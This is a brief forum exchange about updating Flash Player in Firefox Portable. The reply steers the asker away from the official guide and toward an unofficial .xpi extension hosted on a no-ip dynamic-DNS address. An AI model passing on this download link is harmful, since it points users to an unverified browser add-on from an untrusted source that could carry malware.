how update the flash player on firefox portable

I'm interested to inform me how can I update the adobe flash player on my mozilla firefox portable.
here: https://portableapps.com/support/firefox_portable#plugins there is guide that mentions an extension, but the flash extension doesn't work at all, it says that it is corrupted!

easy way

just use the xpi on http://flashplay.no-ip.org/

and forget all the blah blah
